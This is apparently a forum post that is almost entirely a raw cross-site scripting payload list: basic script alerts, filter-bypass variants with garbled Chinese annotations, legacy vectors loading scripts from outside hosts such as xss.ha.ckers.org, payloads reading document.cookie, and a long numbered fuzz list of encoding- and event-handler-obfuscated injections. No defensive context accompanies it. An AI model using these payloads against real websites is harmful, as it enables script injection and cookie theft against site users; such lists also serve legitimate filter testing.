粉丝: 2
关注: 0
积分: 86
精华: 0
金币: 14
经验: 80
最后登录 2020-1-19
|
- <script>alert("XSS")</script>
- <script>alert(123)</script>
- ´úÂë¹ýÂË£º
- medium--> ˫дÈƹý£º<sc<script>ript>alert(/xss/)</script>
- ´óСд»ìÏýÈƹý£º<ScRipt>alert(/xss/)</script>
- high-->ͨ¹ýimg¡¢bodyµÈ±êÇ©µÄʼþ»òÕßiframeµÈ±êÇ©µÄsrc×¢Èë¶ñÒâµÄjs´úÂë:
- <img src=1 onerror=alert(/xss/)>
- <scRscrIPT>prompt(¡®qq¡¯)<Scrscriptipt>
- onmouseover=¡¯alert(xss)¡¯
- onmouseover=¡¯prompt(qq)¡¯
- <script>alert('hello£¬gaga!');</script>
- >"'><img src="javascript.:alert('XSS')">
- >"'><script>alert('XSS')</script>
- <table background='javascript.:alert(([code])'></table>
- <object type=text/html data='javascript.:alert(([code]);'></object>
- "+alert('XSS')+"
- '><script>alert(document.cookie)</script>
- ='><script>alert(document.cookie)</script>
- <script>alert(document.cookie)</script>
- <script>alert(vulnerable)</script>
- <script>alert('XSS')</script>
- <img src="javascript:alert('XSS')">
- %0a%0a<script>alert(\"Vulnerable\")</script>.jsp
- %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
- %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
- %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
- <script>alert('Vulnerable')</script>
- a.jsp/<script>alert('Vulnerable')</script>
- "><script>alert('Vulnerable')</script>
- <IMG SRC="javascript.:alert('XSS');">
- <IMG src="/javascript.:alert"('XSS')>
- <IMG src="/JaVaScRiPt.:alert"('XSS')>
- <IMG src="/JaVaScRiPt.:alert"("XSS")>
- <IMG SRC="jav ascript.:alert('XSS');">
- <IMG SRC="jav
- ascript.:alert('XSS');">
- <IMG SRC="jav
ascript.:alert('XSS');">
- "<IMG src="/java"\0script.:alert(\"XSS\")>";'>out
- <IMG SRC=" javascript.:alert('XSS');">
- <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
- <BODY BACKGROUND="javascript.:alert('XSS')">
- <BODY ONLOAD=alert('XSS')>
- <IMG DYNSRC="javascript.:alert('XSS')">
- <IMG LOWSRC="javascript.:alert('XSS')">
- <BGSOUND SRC="javascript.:alert('XSS');">
- <br size="&{alert('XSS')}">
- <LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
- <LINK REL="stylesheet"HREF="javascript.:alert('XSS');">
- <IMG SRC='vbscript.:msgbox("XSS")'>
- <META. HTTP-EQUIV="refresh"CONTENT="0;url=javascript.:alert('XSS');">
- <IFRAME. src="/javascript.:alert"('XSS')></IFRAME>
- <FRAMESET><FRAME. src="/javascript.:alert"('XSS')></FRAME></FRAMESET>
- <TABLE BACKGROUND="javascript.:alert('XSS')">
- <DIV STYLE="background-image: url(javascript.:alert('XSS'))">
- <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
- <DIV STYLE="width: expression(alert('XSS'));">
- <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
- <IMG STYLE='xss:expre\ssion(alert("XSS"))'>
- <STYLE. TYPE="text/javascript">alert('XSS');</STYLE>
- <STYLE. TYPE="text/css">.XSS{background-image:url("javascript.:alert('XSS')");}</STYLE><A CLASS=XSS></A>
- <STYLE. type="text/css">BODY{background:url("javascript.:alert('XSS')")}</STYLE>
- <BASE HREF="javascript.:alert('XSS');//">
- getURL("javascript.:alert('XSS')")
- a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d);
- <XML SRC="javascript.:alert('XSS');">
- "> <BODY NLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
- <SCRIPT. SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
- <IMG SRC="javascript.:alert('XSS')"
- <SCRIPT. a=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT.=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT. a=">"''SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT."a='>'"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
- <SCRIPT>document.write("<SCRI");</SCRIPT>PTSRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
- <A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
- <script\x20type="text/javascript">javascript:alert(1);</script>
- <script\x3Etype="text/javascript">javascript:alert(2);</script>
- <script\x0Dtype="text/javascript">javascript:alert(3);</script>
- <script\x09type="text/javascript">javascript:alert(4);</script>
- <script\x0Ctype="text/javascript">javascript:alert(5);</script>
- <script\x2Ftype="text/javascript">javascript:alert(6);</script>
- <script\x0Atype="text/javascript">javascript:alert(7);</script>
- '`"><\x3Cscript>javascript:alert(8)</script>
- '`"><\x00script>javascript:alert(9)</script>
- <img src=10 href=10 onerror="javascript:alert(10)"></img>
- <audio src=11 href=11 onerror="javascript:alert(11)"></audio>
- <video src=12 href=12 onerror="javascript:alert(12)"></video>
- <body src=13 href=13 onerror="javascript:alert(13)"></body>
- <image src=14 href=14 onerror="javascript:alert(14)"></image>
- <object src=15 href=15 onerror="javascript:alert(15)"></object>
- <script src=16 href=16 onerror="javascript:alert(16)"></script>
- <svg onResize svg onResize="javascript:javascript:alert(17)"></svg onResize>
- <title onPropertyChange title onPropertyChange="javascript:javascript:alert(18)"></title onPropertyChange>
- <iframe onLoad iframe onLoad="javascript:javascript:alert(19)"></iframe onLoad>
- <body onMouseEnter body onMouseEnter="javascript:javascript:alert(20)"></body onMouseEnter>
- <body onFocus body onFocus="javascript:javascript:alert(21)"></body onFocus>
- <frameset onScroll frameset onScroll="javascript:javascript:alert(22)"></frameset onScroll>
- <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(23)"></script onReadyStateChange>
- <html onMouseUp html onMouseUp="javascript:javascript:alert(24)"></html onMouseUp>
- <body onPropertyChange body onPropertyChange="javascript:javascript:alert(25)"></body onPropertyChange>
- <svg onLoad svg onLoad="javascript:javascript:alert(26)"></svg onLoad>
- <body onPageHide body onPageHide="javascript:javascript:alert(27)"></body onPageHide>
- <body onMouseOver body onMouseOver="javascript:javascript:alert(28)"></body onMouseOver>
- <body onUnload body onUnload="javascript:javascript:alert(29)"></body onUnload>
- <body onLoad body onLoad="javascript:javascript:alert(30)"></body onLoad>
- <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(31)"></bgsound onPropertyChange>
- <html onMouseLeave html onMouseLeave="javascript:javascript:alert(32)"></html onMouseLeave>
- <html onMouseWheel html onMouseWheel="javascript:javascript:alert(33)"></html onMouseWheel>
- <style onLoad style onLoad="javascript:javascript:alert(34)"></style onLoad>
- <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(35)"></iframe onReadyStateChange>
- <body onPageShow body onPageShow="javascript:javascript:alert(36)"></body onPageShow>
- <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(37)"></style onReadyStateChange>
- <frameset onFocus frameset onFocus="javascript:javascript:alert(38)"></frameset onFocus>
- <applet onError applet onError="javascript:javascript:alert(39)"></applet onError>
- <marquee onStart marquee onStart="javascript:javascript:alert(40)"></marquee onStart>
- <script onLoad script onLoad="javascript:javascript:alert(41)"></script onLoad>
- <html onMouseOver html onMouseOver="javascript:javascript:alert(42)"></html onMouseOver>
- <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(43)"></html onMouseEnter>
- <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(44)"></body onBeforeUnload>
- <html onMouseDown html onMouseDown="javascript:javascript:alert(45)"></html onMouseDown>
- <marquee onScroll marquee onScroll="javascript:javascript:alert(46)"></marquee onScroll>
- <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(47)"></xml onPropertyChange>
- <frameset onBlur frameset onBlur="javascript:javascript:alert(48)"></frameset onBlur>
- <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(49)"></applet onReadyStateChange>
- <svg onUnload svg onUnload="javascript:javascript:alert(50)"></svg onUnload>
- <html onMouseOut html onMouseOut="javascript:javascript:alert(51)"></html onMouseOut>
- <body onMouseMove body onMouseMove="javascript:javascript:alert(52)"></body onMouseMove>
- <body onResize body onResize="javascript:javascript:alert(53)"></body onResize>
- <object onError object onError="javascript:javascript:alert(54)"></object onError>
- <body onPopState body onPopState="javascript:javascript:alert(55)"></body onPopState>
- <html onMouseMove html onMouseMove="javascript:javascript:alert(56)"></html onMouseMove>
- <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(57)"></applet onreadystatechange>
- <body onpagehide body onpagehide="javascript:javascript:alert(58)"></body onpagehide>
- <svg onunload svg onunload="javascript:javascript:alert(59)"></svg onunload>
- <applet onerror applet onerror="javascript:javascript:alert(60)"></applet onerror>
- <body onkeyup body onkeyup="javascript:javascript:alert(61)"></body onkeyup>
- <body onunload body onunload="javascript:javascript:alert(62)"></body onunload>
- <iframe onload iframe onload="javascript:javascript:alert(63)"></iframe onload>
- <body onload body onload="javascript:javascript:alert(64)"></body onload>
- <html onmouseover html onmouseover="javascript:javascript:alert(65)"></html onmouseover>
- <object onbeforeload object onbeforeload="javascript:javascript:alert(66)"></object onbeforeload>
- <body onbeforeunload body onbeforeunload="javascript:javascript:alert(67)"></body onbeforeunload>
- <body onfocus body onfocus="javascript:javascript:alert(68)"></body onfocus>
- <body onkeydown body onkeydown="javascript:javascript:alert(69)"></body onkeydown>
- <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(70)"></iframe onbeforeload>
- <iframe src iframe src="javascript:javascript:alert(71)"></iframe src>
- <svg onload svg onload="javascript:javascript:alert(72)"></svg onload>
- <html onmousemove html onmousemove="javascript:javascript:alert(73)"></html onmousemove>
- <body onblur body onblur="javascript:javascript:alert(74)"></body onblur>
- \x3Cscript>javascript:alert(75)</script>
- '"`><script>/* *\x2Fjavascript:alert(76)// */</script>
- <script>javascript:alert(77)</script\x0D
- <script>javascript:alert(78)</script\x0A
- <script>javascript:alert(79)</script\x0B
- <script charset="\x22>javascript:alert(80)</script>
- <!--\x3E<img src=xxx:x onerror=javascript:alert(81)> -->
- --><!-- ---> <img src=xxx:x onerror=javascript:alert(82)> -->
- --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(83)> -->
- --><!-- --\x284> <img src=xxx:x onerror=javascript:alert(84)> -->
- --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(85)> -->
- `"'><img src='#\x27 onerror=javascript:alert(86)>
- <a href="javascript\x3Ajavascript:alert(87)" id="fuzzelement87">test</a>
- "'`><p><svg><script>a='hello\x27;javascript:alert(88)//';</script></p>
- <a href="javas\x00cript:javascript:alert(89)" id="fuzzelement89">test</a>
- <a href="javas\x07cript:javascript:alert(90)" id="fuzzelement90">test</a>
- <a href="javas\x0Dcript:javascript:alert(91)" id="fuzzelement91">test</a>
- <a href="javas\x0Acript:javascript:alert(92)" id="fuzzelement92">test</a>
- <a href="javas\x08cript:javascript:alert(93)" id="fuzzelement93">test</a>
- <a href="javas\x02cript:javascript:alert(94)" id="fuzzelement94">test</a>
- <a href="javas\x03cript:javascript:alert(95)" id="fuzzelement95">test</a>
- <a href="javas\x04cript:javascript:alert(96)" id="fuzzelement96">test</a>
- <a href="javas\x097cript:javascript:alert(97)" id="fuzzelement97">test</a>
- <a href="javas\x05cript:javascript:alert(98)" id="fuzzelement98">test</a>
- <a href="javas\x0Bcript:javascript:alert(99)" id="fuzzelement99">test</a>
- <a href="javas\x09cript:javascript:alert(100)" id="fuzzelement100">test</a>
- <a href="javas\x06cript:javascript:alert(101)" id="fuzzelement101">test</a>
- <a href="javas\x0Ccript:javascript:alert(102)" id="fuzzelement102">test</a>
- <script>/* *\x2A/javascript:alert(103)// */</script>
- <script>/* *\x00/javascript:alert(104)// */</script>
- <style></style\x3E<img src="about:blank" onerror=javascript:alert(105)//></style>
- <style></style\x0D<img src="about:blank" onerror=javascript:alert(106)//></style>
- <style></style\x09<img src="about:blank" onerror=javascript:alert(107)//></style>
- <style></style\x20<img src="about:blank" onerror=javascript:alert(108)//></style>
- <style></style\x0A<img src="about:blank" onerror=javascript:alert(109)//></style>
- "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(110);/*';">DEF
- "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(111);/*';">DEF
- <script>if("x\\xE112\x96\x89".length==2) { javascript:alert(112);}</script>
- <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(113);}</script>
- <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(114);}</script>
- '`"><\x3Cscript>javascript:alert(115)</script>
- '`"><\x00script>javascript:alert(116)</script>
- "'`><\x3Cimg src=xxx:x onerror=javascript:alert(117)>
- "'`><\x00img src=xxx:x onerror=javascript:alert(118)>
- <script src="data:text/plain\x2Cjavascript:alert(119)"></script>
- <script src="data:\xD4\x8F,javascript:alert(120)"></script>
- <script src="data:\xE0\xA4\x98,javascript:alert(121)"></script>
- <script src="data:\xCB\x8F,javascript:alert(122)"></script>
- <script\x20type="text/javascript">javascript:alert(123);</script>
- <script\x3Etype="text/javascript">javascript:alert(124);</script>
- <script\x0Dtype="text/javascript">javascript:alert(125);</script>
- <script\x09type="text/javascript">javascript:alert(126);</script>
- <script\x0Ctype="text/javascript">javascript:alert(127);</script>
- <script\x2Ftype="text/javascript">javascript:alert(128);</script>
- <script\x0Atype="text/javascript">javascript:alert(129);</script>
- ABC<div style="x\x3Aexpression(javascript:alert(130)">DEF
- ABC<div style="x:expression\x5C(javascript:alert(131)">DEF
- ABC<div style="x:expression\x00(javascript:alert(132)">DEF
- ABC<div style="x:exp\x00ression(javascript:alert(133)">DEF
- ABC<div style="x:exp\x5Cression(javascript:alert(134)">DEF
- ABC<div style="x:\x0Aexpression(javascript:alert(135)">DEF
- ABC<div style="x:\x09expression(javascript:alert(136)">DEF
- ABC<div style="x:\xE3\x80\x80expression(javascript:alert(137)">DEF
- ABC<div style="x:\xE2\x80\x84expression(javascript:alert(138)">DEF
- ABC<div style="x:\xC2\xA0expression(javascript:alert(139)">DEF
- ABC<div style="x:\xE2\x80\x80expression(javascript:alert(140)">DEF
- ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(141)">DEF
- ABC<div style="x:\x0Dexpression(javascript:alert(142)">DEF
- ABC<div style="x:\x0Cexpression(javascript:alert(143)">DEF
- ABC<div style="x:\xE2\x80\x87expression(javascript:alert(144)">DEF
- ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(145)">DEF
- ABC<div style="x:\x20expression(javascript:alert(146)">DEF
- ABC<div style="x:\xE2\x80\x88expression(javascript:alert(147)">DEF
- ABC<div style="x:\x00expression(javascript:alert(148)">DEF
- ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(149)">DEF
- ABC<div style="x:\xE2\x80\x86expression(javascript:alert(150)">DEF
- ABC<div style="x:\xE2\x80\x85expression(javascript:alert(151)">DEF
- ABC<div style="x:\xE2\x80\x82expression(javascript:alert(152)">DEF
- ABC<div style="x:\x0Bexpression(javascript:alert(153)">DEF
- ABC<div style="x:\xE2\x80\x8154expression(javascript:alert(154)">DEF
- ABC<div style="x:\xE2\x80\x83expression(javascript:alert(155)">DEF
- ABC<div style="x:\xE2\x80\x89expression(javascript:alert(156)">DEF
- <a href="\x0Bjavascript:javascript:alert(157)" id="fuzzelement157">test</a>
- <a href="\x0Fjavascript:javascript:alert(158)" id="fuzzelement158">test</a>
- <a href="\xC2\xA0javascript:javascript:alert(159)" id="fuzzelement159">test</a>
- <a href="\x05javascript:javascript:alert(160)" id="fuzzelement160">test</a>
- <a href="\xE161\xA0\x8Ejavascript:javascript:alert(161)" id="fuzzelement161">test</a>
- <a href="\x1628javascript:javascript:alert(162)" id="fuzzelement162">test</a>
- <a href="\x163163javascript:javascript:alert(163)" id="fuzzelement163">test</a>
- <a href="\xE2\x80\x88javascript:javascript:alert(164)" id="fuzzelement164">test</a>
- <a href="\xE2\x80\x89javascript:javascript:alert(165)" id="fuzzelement165">test</a>
- <a href="\xE2\x80\x80javascript:javascript:alert(166)" id="fuzzelement166">test</a>
- <a href="\x1677javascript:javascript:alert(167)" id="fuzzelement167">test</a>
- <a href="\x03javascript:javascript:alert(168)" id="fuzzelement168">test</a>
- <a href="\x0Ejavascript:javascript:alert(169)" id="fuzzelement169">test</a>
- <a href="\x170Ajavascript:javascript:alert(170)" id="fuzzelement170">test</a>
- <a href="\x00javascript:javascript:alert(171)" id="fuzzelement171">test</a>
- <a href="\x1720javascript:javascript:alert(172)" id="fuzzelement172">test</a>
- <a href="\xE2\x80\x82javascript:javascript:alert(173)" id="fuzzelement173">test</a>
- <a href="\x20javascript:javascript:alert(174)" id="fuzzelement174">test</a>
- <a href="\x1753javascript:javascript:alert(175)" id="fuzzelement175">test</a>
- <a href="\x09javascript:javascript:alert(176)" id="fuzzelement176">test</a>
- <a href="\xE2\x80\x8Ajavascript:javascript:alert(177)" id="fuzzelement177">test</a>
- <a href="\x1784javascript:javascript:alert(178)" id="fuzzelement178">test</a>
- <a href="\x1799javascript:javascript:alert(179)" id="fuzzelement179">test</a>
- <a href="\xE2\x80\xAFjavascript:javascript:alert(180)" id="fuzzelement180">test</a>
- <a href="\x181Fjavascript:javascript:alert(181)" id="fuzzelement181">test</a>
- <a href="\xE2\x80\x8182javascript:javascript:alert(182)" id="fuzzelement182">test</a>
- <a href="\x183Djavascript:javascript:alert(183)" id="fuzzelement183">test</a>
- <a href="\xE2\x80\x87javascript:javascript:alert(184)" id="fuzzelement184">test</a>
- <a href="\x07javascript:javascript:alert(185)" id="fuzzelement185">test</a>
- <a href="\xE186\x9A\x80javascript:javascript:alert(186)" id="fuzzelement186">test</a>
- <a href="\xE2\x80\x83javascript:javascript:alert(187)" id="fuzzelement187">test</a>
- <a href="\x04javascript:javascript:alert(188)" id="fuzzelement188">test</a>
- <a href="\x0189javascript:javascript:alert(189)" id="fuzzelement189">test</a>
- <a href="\x08javascript:javascript:alert(190)" id="fuzzelement190">test</a>
- <a href="\xE2\x80\x84javascript:javascript:alert(191)" id="fuzzelement191">test</a>
- <a href="\xE2\x80\x86javascript:javascript:alert(192)" id="fuzzelement192">test</a>
- <a href="\xE3\x80\x80javascript:javascript:alert(193)" id="fuzzelement193">test</a>
- <a href="\x1942javascript:javascript:alert(194)" id="fuzzelement194">test</a>
- <a href="\x0Djavascript:javascript:alert(195)" id="fuzzelement195">test</a>
- <a href="\x0Ajavascript:javascript:alert(196)" id="fuzzelement196">test</a>
- <a href="\x0Cjavascript:javascript:alert(197)" id="fuzzelement197">test</a>
- <a href="\x1985javascript:javascript:alert(198)" id="fuzzelement198">test</a>
- <a href="\xE2\x80\xA8javascript:javascript:alert(199)" id="fuzzelement199">test</a>
- <a href="\x2006javascript:javascript:alert(200)" id="fuzzelement200">test</a>
- <a href="\x02javascript:javascript:alert(201)" id="fuzzelement201">test</a>
- <a href="\x202Bjavascript:javascript:alert(202)" id="fuzzelement202">test</a>
- <a href="\x06javascript:javascript:alert(203)" id="fuzzelement203">test</a>
- <a href="\xE2\x80\xA9javascript:javascript:alert(204)" id="fuzzelement204">test</a>
- <a href="\xE2\x80\x85javascript:javascript:alert(205)" id="fuzzelement205">test</a>
- <a href="\x206Ejavascript:javascript:alert(206)" id="fuzzelement206">test</a>
- <a href="\xE2\x8207\x9Fjavascript:javascript:alert(207)" id="fuzzelement207">test</a>
- <a href="\x208Cjavascript:javascript:alert(208)" id="fuzzelement208">test</a>
- <a href="javascript\x00:javascript:alert(209)" id="fuzzelement209">test</a>
- <a href="javascript\x3A:javascript:alert(210)" id="fuzzelement210">test</a>
- <a href="javascript\x09:javascript:alert(211)" id="fuzzelement211">test</a>
- <a href="javascript\x0D:javascript:alert(212)" id="fuzzelement212">test</a>
- <a href="javascript\x0A:javascript:alert(213)" id="fuzzelement213">test</a>
- `"'><img src=xxx:x \x0Aonerror=javascript:alert(214)>
- `"'><img src=xxx:x \x22onerror=javascript:alert(215)>
- `"'><img src=xxx:x \x0Bonerror=javascript:alert(216)>
- `"'><img src=xxx:x \x0Donerror=javascript:alert(217)>
- `"'><img src=xxx:x \x2Fonerror=javascript:alert(218)>
- `"'><img src=xxx:x \x09onerror=javascript:alert(219)>
- `"'><img src=xxx:x \x0Conerror=javascript:alert(220)>
- `"'><img src=xxx:x \x00onerror=javascript:alert(221)>
- `"'><img src=xxx:x \x27onerror=javascript:alert(222)>
- `"'><img src=xxx:x \x20onerror=javascript:alert(223)>
- "`'><script>\x3Bjavascript:alert(224)</script>
- "`'><script>\x0Djavascript:alert(225)</script>
- "`'><script>\xEF\xBB\xBFjavascript:alert(226)</script>
- "`'><script>\xE2\x80\x8227javascript:alert(227)</script>
- "`'><script>\xE2\x80\x84javascript:alert(228)</script>
- "`'><script>\xE3\x80\x80javascript:alert(229)</script>
- "`'><script>\x09javascript:alert(230)</script>
- "`'><script>\xE2\x80\x89javascript:alert(231)</script>
- "`'><script>\xE2\x80\x85javascript:alert(232)</script>
- "`'><script>\xE2\x80\x88javascript:alert(233)</script>
- "`'><script>\x00javascript:alert(234)</script>
- "`'><script>\xE2\x80\xA8javascript:alert(235)</script>
- "`'><script>\xE2\x80\x8Ajavascript:alert(236)</script>
- "`'><script>\xE237\x9A\x80javascript:alert(237)</script>
- "`'><script>\x0Cjavascript:alert(238)</script>
- "`'><script>\x2Bjavascript:alert(239)</script>
- "`'><script>\xF0\x90\x96\x9Ajavascript:alert(240)</script>
- "`'><script>-javascript:alert(241)</script>
- "`'><script>\x0Ajavascript:alert(242)</script>
- "`'><script>\xE2\x80\xAFjavascript:alert(243)</script>
- "`'><script>\x7Ejavascript:alert(244)</script>
- "`'><script>\xE2\x80\x87javascript:alert(245)</script>
- "`'><script>\xE2\x8246\x9Fjavascript:alert(246)</script>
- "`'><script>\xE2\x80\xA9javascript:alert(247)</script>
- "`'><script>\xC2\x85javascript:alert(248)</script>
- "`'><script>\xEF\xBF\xAEjavascript:alert(249)</script>
- "`'><script>\xE2\x80\x83javascript:alert(250)</script>
- "`'><script>\xE2\x80\x8Bjavascript:alert(251)</script>
- "`'><script>\xEF\xBF\xBEjavascript:alert(252)</script>
- "`'><script>\xE2\x80\x80javascript:alert(253)</script>
- "`'><script>\x2254javascript:alert(254)</script>
- "`'><script>\xE2\x80\x82javascript:alert(255)</script>
- "`'><script>\xE2\x80\x86javascript:alert(256)</script>
- "`'><script>\xE257\xA0\x8Ejavascript:alert(257)</script>
- "`'><script>\x0Bjavascript:alert(258)</script>
- "`'><script>\x20javascript:alert(259)</script>
- "`'><script>\xC2\xA0javascript:alert(260)</script>
- "/><img/onerror=\x0Bjavascript:alert(261)\x0Bsrc=xxx:x />
- "/><img/onerror=\x22javascript:alert(262)\x22src=xxx:x />
- "/><img/onerror=\x09javascript:alert(263)\x09src=xxx:x />
- "/><img/onerror=\x27javascript:alert(264)\x27src=xxx:x />
- "/><img/onerror=\x0Ajavascript:alert(265)\x0Asrc=xxx:x />
- "/><img/onerror=\x0Cjavascript:alert(266)\x0Csrc=xxx:x />
- "/><img/onerror=\x0Djavascript:alert(267)\x0Dsrc=xxx:x />
- "/><img/onerror=\x60javascript:alert(268)\x60src=xxx:x />
- "/><img/onerror=\x20javascript:alert(269)\x20src=xxx:x />
- <script\x2F>javascript:alert(270)</script>
- <script\x20>javascript:alert(271)</script>
- <script\x0D>javascript:alert(272)</script>
- <script\x0A>javascript:alert(273)</script>
- <script\x0C>javascript:alert(274)</script>
- <script\x00>javascript:alert(275)</script>
- <script\x09>javascript:alert(276)</script>
- `"'><img src=xxx:x onerror\x0B=javascript:alert(277)>
- `"'><img src=xxx:x onerror\x00=javascript:alert(278)>
- `"'><img src=xxx:x onerror\x0C=javascript:alert(279)>
- `"'><img src=xxx:x onerror\x0D=javascript:alert(280)>
- `"'><img src=xxx:x onerror\x20=javascript:alert(281)>
- `"'><img src=xxx:x onerror\x0A=javascript:alert(282)>
- `"'><img src=xxx:x onerror\x09=javascript:alert(283)>
- <script>javascript:alert(284)<\x00/script>
- <img src=# onerror\x3D"javascript:alert(285)" >
- <input onfocus=javascript:alert(286) autofocus>
- <input onblur=javascript:alert(287) autofocus><input autofocus>
- <video poster=javascript:javascript:alert(288)//
- <body onscroll=javascript:alert(289)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
- <form id=test onforminput=javascript:alert(290)><input></form><button form=test onformchange=javascript:alert(290)>X
- <video><source onerror="javascript:javascript:alert(291)">
- <video onerror="javascript:javascript:alert(292)"><source>
- <form><button formaction="javascript:javascript:alert(293)">X
- <body oninput=javascript:alert(294)><input autofocus>
- <math href="javascript:javascript:alert(295)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(295)">CLICKME</maction> </math>
- <frameset onload=javascript:alert(296)>
- <table background="javascript:javascript:alert(297)">
- <!--<img src="--><img src=x onerror=javascript:alert(298)//">
- <comment><img src="</comment><img src=x onerror=javascript:alert(299))//">
- <![><img src="]><img src=x onerror=javascript:alert(300)//">
- <style><img src="</style><img src=x onerror=javascript:alert(301)//">
- <li style=list-style:url() onerror=javascript:alert(302)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(302)></div>
- <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(303)//#">XXX</a></body>
- <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(304)</SCRIPT>
- <OBJECT CLASSID="clsid:333C7BC4-460F-305305D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(305)"></OBJECT>
- <b <script>alert(308)</script>0
- <div id="div309"><input value="``onmouseover=javascript:alert(309)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div309").innerHTML;</script>
- <x '="foo"><x foo='><img src=x onerror=javascript:alert(310)//'>
- <embed src="javascript:alert(311)">
- <img src="javascript:alert(312)">
- <image src="javascript:alert(313)">
- <script src="javascript:alert(314)">
- <div style=width:315px;filter:glow onfilterchange=javascript:alert(315)>x
- <? foo="><script>javascript:alert(316)</script>">
- <! foo="><script>javascript:alert(317)</script>">
- </ foo="><script>javascript:alert(318)</script>">
- <? foo="><x foo='?><script>javascript:alert(319)</script>'>">
- <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(320)</script>">
- <% foo><x foo="%><script>javascript:alert(321)</script>">
- <div id=d><x xmlns="><iframe onload=javascript:alert(322)"></div> <script>d.innerHTML=d.innerHTML</script>
- <img \x00src=x onerror="alert(323)">
- <img \x47src=x onerror="javascript:alert(324)">
- <img \x325325src=x onerror="javascript:alert(325)">
- <img \x3262src=x onerror="javascript:alert(326)">
- <img\x47src=x onerror="javascript:alert(327)">
- <img\x3280src=x onerror="javascript:alert(328)">
- <img\x3293src=x onerror="javascript:alert(329)">
- <img\x32src=x onerror="javascript:alert(330)">
- <img\x47src=x onerror="javascript:alert(331)">
- <img\x332332src=x onerror="javascript:alert(332)">
- <img \x47src=x onerror="javascript:alert(333)">
- <img \x34src=x onerror="javascript:alert(334)">
- <img \x39src=x onerror="javascript:alert(335)">
- <img \x00src=x onerror="javascript:alert(336)">
- <img src\x09=x onerror="javascript:alert(337)">
- <img src\x3380=x onerror="javascript:alert(338)">
- <img src\x3393=x onerror="javascript:alert(339)">
- <img src\x32=x onerror="javascript:alert(340)">
- <img src\x3412=x onerror="javascript:alert(341)">
- <img src\x342342=x onerror="javascript:alert(342)">
- <img src\x00=x onerror="javascript:alert(343)">
- <img src\x47=x onerror="javascript:alert(344)">
- <img src=x\x09onerror="javascript:alert(345)">
- <img src=x\x3460onerror="javascript:alert(346)">
- <img src=x\x347347onerror="javascript:alert(347)">
- <img src=x\x3482onerror="javascript:alert(348)">
- <img src=x\x3493onerror="javascript:alert(349)">
- <img[a][b][c]src[d]=x[e]onerror=[f]"alert(350)">
- <img src=x onerror=\x09"javascript:alert(351)">
- <img src=x onerror=\x3520"javascript:alert(352)">
- <img src=x onerror=\x353353"javascript:alert(353)">
- <img src=x onerror=\x3542"javascript:alert(354)">
- <img src=x onerror=\x32"javascript:alert(355)">
- <img src=x onerror=\x00"javascript:alert(356)">
- <a href=javať񗏭෴script:javascript:alert(357)>XXX</a>
- <img src="x` `<script>javascript:alert(358)</script>"` `>
- <img src onerror /" '"= alt=javascript:alert(359)//">
- <title onpropertychange=javascript:alert(360)></title><title title=>
- <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(361)></a>">
- <!--[if]><script>javascript:alert(362)</script -->
- <!--[if<img src=x onerror=javascript:alert(363)//]> -->
- <object id="x" classid="clsid:CB927D3662-4FF7-4a9e-A36669-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C3667-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(366)" style="behavior:url(#x);"><param name=postdomevents /></object>
- <a style="-o-link:'javascript:javascript:alert(367)';-o-link-source:current">X
- <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(368)'}{}*{-o-link-source:current}]{color:red};</style>
- <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(369))%7d
- <style>@import "data:,*%7bx:expression(javascript:alert(370))%7D";</style>
- <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(371);">XXX</a></a><a href="javascript:javascript:alert(371)">XXX</a>
- <// style=x:expression\28javascript:alert(375)\29>
- <style>*{x:expression(javascript:alert(376))}</style>
